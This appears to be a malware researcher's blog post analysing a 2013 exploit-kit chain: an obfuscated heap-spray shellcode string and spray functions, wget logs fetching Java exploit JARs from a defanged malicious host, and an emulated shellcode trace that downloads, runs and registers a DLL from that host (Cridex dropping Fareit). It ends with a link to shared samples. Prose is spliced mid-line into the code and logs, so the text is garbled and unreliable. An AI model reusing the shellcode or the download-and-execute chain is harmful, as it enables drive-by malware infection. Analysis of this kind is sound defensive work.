1e16!%ddb1!%8Ob2!%3ae5!%dde7!%O5b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%cOda!%fac1!%
d53d!%11e2!%bee6!%8681!%O93a!%7d7d!%d383!%9a6c!%b14O!%b2c5!%6741!%e43a!%b13f!%e5O2!%e73a!%
8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%5O8e!%afbe!%O42e!%O382!%
efO8!%9eeO!%6618!%139c!%O185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join(""function getBlockSize(){A changes eventually also detected only in JARs too: First & second JAR during download (snipped log)
return 1024}
function getAllocSize(){
return 1024 * 1024}
function getAllocCount(){
return 300}
function getFillBytes(){
var a = '%u' + '0c0c';
return a + a}--11:01:49-- h00p://dfudont.ru:8080/forum/links/column.phpBoth jars are having same previous exploit codes, in try1.jar was detected new obfuscation only: while in (ex-)0day jar/try2.jar was the MD5 changes: New changed sample's Detection Ratio in VT: [Landing Page] [JAR1] [JAR2]
=> `column.php.1'
Resolving dfudont.ru... seconds 0.00, 89.111.176.125, 91.224.135.20, 212.112.207.15
Caching dfudont.ru => 89.111.176.125 91.224.135.20 212.112.207.15
Connecting to dfudont.ru|89.111.176.125|:8080... seconds 0.00, connected.
:
GET /forum/links/column.php HTTP/1.0 (older java request)
Host: dfudont.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Fri, 18 Jan 2013 02:01:44 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 16830
ETag: "571e4f2c6881ced7067423592c3a9958"
Last-Modified: Fri, 18 Jan 2013 02:01:44 GMT
Accept-Ranges: bytes
:
200 OK
Length: 16,830 (16K) [application/java-archive]
11:01:51 (31.60 KB/s) - `try1.jar' saved [16830/16830]
GET /forum/links/column.php HTTP/1.0 (newer java request)
Host: dfudont.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Fri, 18 Jan 2013 02:08:09 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 22824
ETag: "1bfec3a52c1b19ee4aaaba0be551c1f1"
Last-Modified: Fri, 18 Jan 2013 02:02:52 GMT
Accept-Ranges: bytes
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 22,824 (22K) [application/java-archive]
11:02:59 (35.13 KB/s) - `try2.jar' saved [22824/22824]How about the payload?
It is the same as the original post wrote :-) Cridex that dropped Fareit. PoC, translated API of shellcode shows URL:0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)Download logs (snipped):
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://dfudont.ru:8080/forum/links/column.php?bf=30:1n:1i:1i:33&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&bb=a&hy=m, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0):The file:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Fri, 18 Jan 2013 04:35:44 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Fri, 18 Jan 2013 04:35:44 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 197632
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 197,632 (193K) [application/x-msdownload]
100%[====================================>] 197,632 71.52K/s
13:35:53 (71.40 KB/s) - `calc.exe' saved [197632/197632]@unixfreaxjp /malware]$ ls -alF info.exe ; md5 info.exeI guess these moronz didn't have enough time to make new payload, eh? :-) Tick.. tock.. tick.. tock...
-rwxr--r-- 1 MMD toor 197632 Jan 17 01:28 info.exe*
MD5 (info.exe) = f188879d2cc11dae25c6368cd2f4ad96Samples
For the research/education about malware & to increase detection rates - we are sharing the samples here -->>[MEDIAFIRE]